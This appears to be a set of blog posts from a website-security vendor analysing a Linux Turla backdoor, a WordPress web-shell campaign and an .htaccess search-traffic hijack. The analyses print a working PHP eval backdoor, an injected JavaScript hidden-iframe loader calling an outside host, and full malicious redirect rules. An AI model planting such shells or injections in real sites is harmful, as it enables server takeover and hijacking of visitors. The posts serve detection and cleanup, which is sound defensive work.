'Turla' Malware Now Supports Linux

New Sample Of 'Turla' Backdoor - Linux Version

A new 'Turla' Trojan sample has been discovered that targeting Linux operating systems. The previous 'Turla' Trojan targeted Windows operating system but the newly discovered sample supports Linux operating systems too. 

The malware static linking to all required external libraries which makes it independent from

libraries and their versions installed on the victim machine.

'Turla' is derived from publicly available backdoor cd00r (http://www.phenoelit.org/stuff/cd00r.c) and it doesn't 

require administrator (root) privileges and could be executed by any user.

Once, the 'Turla' Trojan executed, it starts a network sniffer and listen for a specific network packet. Once the packet received 'Turla' activates backdoor functionality. 

The first 'Turla' Trojan sample was discovered in yearly 2012 when it was used to attack government computers and servers.

At the time this post was written, new sample was already detected by almost 50% of major antivirus engines

https://www.virustotal.com/en/file/3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4/analysis/

Backdoor Malware Targeting WordPress Websites

Backdoor Malware In The Wild Targeting WordPress Websites

If your website gets reinfected every 20-30 minutes. If blacklisting authorities like Google Safe Browsing does not keep up with the reinfection and fail to inform you. If you run WordPress platform and use 3-d party plugins/themes.

Then, it is likely you suffer from Backdoor that our malware research labs have recently discovered while cleaning customer websites.

You can check your site with our external and free scan using Quttera Free Website Malware Scanner

Background of the infection

How many websites attacked?

There is no exact number but more than two thousands. During first weeks of this infection Google didn't recognize it. The malware code included logic to clean-up previous infection and insert a new one.

Which platforms were targeted?

Current version mostly aimed WordPress installations.

What malicious action was applied to victim sites and their visitors?

Successful attack injected hidden iframes into every JavaScript file. On home page load, visitor's web browser loaded numerous JS files and got connected in background to several other websites via iframes.

How many files were infected?

All JavaScript files available on attacked server.

Where the files were located?

All infected files located in wp-content and wp-include directories.

The root cause

How backdoor was identified?

One of our customers was blacklisted by Google due to another kind of infection. During the investigation current malware was uncovered as well. At the same time, we detected this infection on websites of our other customers, which bypassed Google's and other's radars.

Backdoor details

A backdoor (or just shell file) was uploaded utilizing themes/plugins vulnerabilities. Following is an example of how attacker searched for available vulnerability using HTTP HEAD request:

"HEAD /fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 "HEAD /fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 318 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 318 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/aspx/connector.aspx HTTP/1.1" 404 318 "-" "-" "HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"

All of those were attempts to find a way to upload the following backdoor which is then used to infect the server:

<?php if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

The backdoor decoded content of the "message" field provided in HTTP post request,

$message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message'])))))

executed provided commands,

eval($message)

and printed script output into returned HTML,

{echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

The script is generic and it permites execution of any PHP code provided in "message" argument.

Finally, the target of this backdoor/shell was to execute and input script which then infected all JS files on the compromised system.

The actual infection is a header, prepended  to every JS file:

/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*) "));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase( );var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone ','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure" )===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://iframehost/something17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */

Attack flow

So how this worked?

1. Server A searched the web for WordPress installations with known vulnerabilities.
2. Backdoor/Shell uploaded to servers detected in step (1).
3. Server B invokes the shell with a PHP code that performs JS files infection.
4. Re-infection occurs every 20-30 minutes.

Malware clean-up

As a first step, we have identified the organization that owned the IP. We have then contacted the hosting provider and filed malware/abuse report.

We have conducted all necessary steps to clean up the 3K+ infected files, updated all outdated software and remode vulnerable plugins.

If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Htaccess Hack Serving BlackHat SEO

Search Engine Traffic Hijacking

We are cleaning infected websites on daily basis and the most common question we are being asked is how to identify Search Engine Traffic Hijacking before my website is infected further and Google (Yahoo, Bing or any other search engine provider) blacklists it. Usually, this is how a website owner notices that his website is infected and compromised.

The first thing to check out is .htaccess file which can be used to redirect traffic from search engines to a hijacker website. If your website is infected/ hacked using this method, it means that when someone finds your website on a search engine and clicks on a link to visit your website, he will be redirected to a hijacker website instead of yours.

How to find Search Engine Traffic Hijacking?

If you are experiencing traffic hijacking, most likely your .htaccess file updated with malicious code or new .htaccess files are populated across all your sub-directories.

Search for .htaccess file(s) within all your sub-directories, check your .htaccess file(s) for suspicious code and make sure they do not contain malicious code.

The most common way used to hijack search engine traffic is to add malicious code into existing .htaccess files. That way you, as website owner, won't notice anything strange as your website would be operating normally.

The other way is to wipe out the existing .htaccess file and replace it with malicious code only.

Here is an example from a very popular website that we cleaned-up recently. The malicious code was there for a short period of time, yet that was enough to get it blacklisted by Google. Actually, this is how the website administrator noticed it. The impact was that near 99% website traffic was redirected to other URLs.

Malware Investigation

External investigation of website by online remote malware scanner detected:

1. Traffic redirect to malicious site
2. Every HTML page contained hidden iframe to malicious IP as last line in body DOM element

From the investigation of .htaccess files it was found that infection was added to temporary redirect (302) to numerous URLs (some were already blacklisted by Google).

Hacked .htaccess file body example:

1. RewriteEngine On
2. RewriteCond %{REQUEST_METHOD}   ^GET$
3. RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
4. RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
5. RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
6. RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
7. RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
8. RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
9. RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
10. RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
11. RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
12. RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
13. RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
14. RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
15. RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
16. RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
17. RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
18. RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
19. RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
20. RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
21. RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
22. RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
23. RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
24. RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
25. RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
26. RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
27. RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
28. RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
29. RewriteCond %{HTTPS}            ^off$
30. RewriteRule ^(.*)$   http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

Payload

The execution algorithm can be described as following:

Apache is handling "HTTP-GET" request, -

IF visitor's:

1. Source was from search engine (see below) 
2. Agent used is not listed in table(see below) of user agents
3. Passed cookie does not contain string "xccgtswgokoe"

Then

1. Redirect visitor to URL "http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d"
2. Inject cookie "xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly"

List of monitored search engines:

1. http://google.*
2. http://yahoo.*
3. http://bing.*
4. http://msn.*
5. http://yandex.*
6. http://ask.*
7. http://excite.*
8. http://altavista.*
9. http://netscape.*
10. http://aol.*
11. http://hotbot.*
12. http://goto.*
13. http://infoseek.*
14. http://mamma.*
15. http://alltheweb.*
16. http://lycos.*
17. http://search.*
18. http://metacrawler.*
19. http://rambler.*
20. http://mail.*
21. http://dogpile.*
22. http://ya.*

List of filtered out user agents should contain strings:

1. Accoona
2. Ace\sExplorer
3. Amfibi
4. Amiga\sOS
5. AppleSyndication
6. Archive
7. Argus
8. Ask\sJeeves
9. Atrenko\sNews
10. BeOS
11. BigBlogZoo
12. Biz360
13. Blaiz
14. BlogPulse
15. BlogSearch
16. Bloglines
17. BlogsLive
18. BlogsSay
19. Bookmark
20. CE\-Preload
21. CFNetwork
22. Combine
23. Crawl
24. DTAAgent
25. Danger\shiptop
26. Diagnostics
27. EmeraldShield
28. Evaal
29. Everest\-Vulcan
30. Feed
31. Fetch
32. FreeBSD
33. Friendster
34. Fuck\sYou
35. Google
36. Gregarius
37. HP\-UX
38. HTML2JPG
39. HatenaScreenshot
40. HolyCowDude
41. Honda\-Search
42. HttpClient
43. IRIX
44. Jakarta
45. JetBrains
46. Krugle
47. Labrador
48. LeechGet
49. Liferea
50. LinkChecker
51. LinknSurf
52. Linux
53. LiveJournal
54. Lonopono
55. Lotus\-Notes
56. Lycos
57. Lynx
58. Mac\_PPC
59. Mac\_PowerPC
60. Mac\s10
61. Mediapartners
62. Megite
63. MetaProducts
64. Miva
65. Mobile
66. NetBSD
67. NetNewsWire
68. NetResearchServer
69. NewsAlloy
70. NewsFire
71. NewsGatorOnline
72. NewsMacPro
73. Nokia
74. NuSearch
75. Nutch
76. ObjectSearch
77. Octora
78. OmniExplorer
79. Omnipelagos
80. Onet
81. OpenBSD
82. OpenIntelligenceData
83. Python
84. RSS
85. Rambler
86. Rojo
87. SBIder
88. Scooter
89. Seeker
90. Series\s60
91. SharpReader
92. SiteBar
93. Slurp
94. Snoopy
95. Soap\sClient
96. Socialmarks
97. Sphere\sScout
98. Straw
99. SunOS
100. Surfer
101. Syndic8
102. Syntryx
103. TargetYourNews
104. Technorati
105. Thunderbird
106. Twiceler
107. Validator
108. Vienna
109. W3C
110. WWWeasel
111. Wavefire
112. WebPatrol
113. Webmaster
114. Win16
115. Win95
116. Win98
117. WinHTTP
118. WinNT4
119. Win\s9x
120. Windows\s95
121. Windows\s98
122. Windows\sCE
123. Windows\sNT\s4
124. WordPress
125. Yahoo
126. Yandex
127. Yeti
128. YouReadMe
129. Zhuaxia
130. ZyBorg
131. apache
132. appie
133. asterias
134. bing
135. blogWatcher
136. bot
137. cococ
138. curl
139. ecto
140. endo
141. exactseek
142. findlinks
143. heritrix
144. httpunit
145. iGetter
146. iPhone
147. ichiro
148. larbin
149. libwww
150. macDN
151. oreilly
152. psycheclone
153. retriever
154. spider
155. sproose
156. subscriber
157. urllib
158. voyager
159. webcollage
160. wget
161. wwwster
162. yacy

Summary

The hijacked traffic was redirected using blackhat SEO techniques. Just to name a few, such as pills/pharma, phishing, cash loans, pay-per-click providers, begs sales and so on. Just to sum it up, - the attack was designed to hijack traffic and redirect it to whatsoever websites defined by an attacker.

Website Malware Scanning And Malware Clean-Up

Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove such malware using Quttera's website malware scan report and manually investigating your site's .htaccess file(s). Few important things to remember: make sure you use SFTP and not FTP, do backup, change password(s) and, of course, don't forget to submit your website(s) for re-testing and removing from blacklist if needed.